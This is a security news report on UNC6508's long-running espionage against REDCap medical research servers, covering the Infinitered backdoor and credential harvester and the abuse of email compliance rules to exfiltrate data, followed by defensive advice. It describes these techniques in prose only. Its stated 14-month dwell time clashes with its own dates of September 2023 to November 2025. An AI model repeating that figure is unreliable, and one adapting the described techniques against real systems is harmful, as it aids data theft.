Chinese Hackers Stole Medical Research Data Undetected for a Year

Key Takeaways

• Chinese threat actor UNC6508 maintained access to a medical research network for over 14 months before detection
• Custom malware called Infinitered was designed specifically to compromise REDCap research database servers
• Attackers used legitimate email compliance features to automatically exfiltrate data matching military and medical research keywords

What Happened

A China-linked hacking group breached REDCap servers at a North American medical research institution and remained undetected for more than a year. Google Threat Intelligence Group (GTIG) published findings on the campaign, attributing the attacks to a threat actor they track as UNC6508.

REDCap (Research Electronic Data Capture) is a web-based platform used by thousands of medical and academic institutions worldwide to manage clinical trial databases, patient surveys, and research data. The platform is designed to comply with medical research regulations, making it a repository of valuable intellectual property.

According to GTIG, the initial compromise occurred in September 2023. The attackers maintained access through November 2025. That's 14 months of undetected infiltration.

How the Attack Worked

GTIG researchers couldn't determine the exact initial entry point, but they observed UNC6508 probing older, vulnerable versions of REDCap. Three months after gaining access, the attackers deployed custom malware called Infinitered, designed specifically for REDCap systems.

Infinitered consists of three components: a persistence and update module, a credential harvester, and a backdoor. The attackers hid these components by trojanizing the server's system files.

The login harvester captures usernames and passwords submitted through REDCap login pages. It encrypts and stores them in local REDCap database tables for later retrieval. The backdoor receives commands via HTTP cookies and gives attackers the ability to:

• Execute shell commands on the server
• Upload and download files
• Run arbitrary SQL queries against research databases
• Retrieve or delete stolen credentials
• Extract system and database information

A Novel Exfiltration Technique

One technique stood out to GTIG researchers as new for China-linked threat actors. After gaining administrator access, UNC6508 abused the legitimate "content compliance rules" feature found in cloud-based enterprise productivity tools to exfiltrate data over email.

The attackers created a compliance rule named "Patroit" (the misspelling is as it appeared). This rule scanned the organization's systems for specific keywords, content patterns, email addresses, and phone numbers. Any matches were automatically sent as a blind carbon copy to an attacker-controlled Gmail address: BebitaBarefoot774@gmail.com. Google has since disabled this account.

The keywords targeted by this automated exfiltration reveal the attackers' priorities: medical research, advanced technology, military topics, and geo-strategic policy.

“The actors targeted institutions involved in clinical trials, drug discovery, and military intelligence, demonstrating a strategic interest in high-value intellectual property.”

— Google Threat Intelligence Group researchers

Strong Operational Security

GTIG noted a high level of operational security throughout the campaign. The attackers used US-based residential proxy infrastructure to mask their true location. They also routed traffic through compromised routers and virtual private servers, replayed legitimate credentials to blend in with normal activity, and maintained dedicated infrastructure solely for data exfiltration.

This layered approach explains how UNC6508 avoided detection for so long. Traffic appeared to originate from legitimate US IP addresses, and the attackers used valid credentials rather than exploiting vulnerabilities that might trigger security alerts.

Who's at Risk

Google has notified multiple organizations in the US and Canada that were compromised. The company did not disclose the specific institutions affected.

Any organization running REDCap should audit their installations. The attackers specifically targeted older, vulnerable versions. Self-hosted research infrastructure at academic institutions is particularly vulnerable. Cybersecurity experts note that underfunded academic IT departments often struggle to patch legacy server software as quickly as commercial enterprises.

Defensive Recommendations

Organizations using REDCap should take immediate steps to protect their installations. Update all REDCap instances to the latest version. Review server system files for unauthorized modifications. Audit content compliance rules for suspicious configurations. Monitor for unusual email forwarding rules, especially those sending BCCs to external addresses.

Network segmentation can limit damage if attackers breach perimeter defenses. Research databases containing sensitive IP should not share network segments with general-purpose systems. Credential monitoring can detect the kind of harvesting Infinitered performs.

Frequently Asked Questions

Frequently Asked Questions

What is REDCap and why was it targeted?

REDCap (Research Electronic Data Capture) is a web-based platform used by thousands of medical and academic institutions to manage clinical research databases. It stores sensitive patient data and proprietary research findings, making it valuable for state-sponsored espionage groups seeking advantages in medical innovation.

How long did the hackers have access before being detected?

UNC6508 maintained undetected access for more than 14 months, from September 2023 through November 2025.

What data was stolen in the REDCap breach?

The attackers targeted data related to clinical trials, drug discovery, military topics, and geo-strategic policy. They used automated keyword searches to identify and exfiltrate valuable research.

How can organizations protect their REDCap installations?

Update to the latest REDCap version, audit system files for modifications, review email compliance rules for suspicious configurations, and implement network segmentation to isolate research databases.

Which organizations were affected by this breach?

Google notified multiple organizations in the US and Canada but did not publicly disclose specific names. Any institution running older REDCap versions should conduct security audits.

Source: BleepingComputer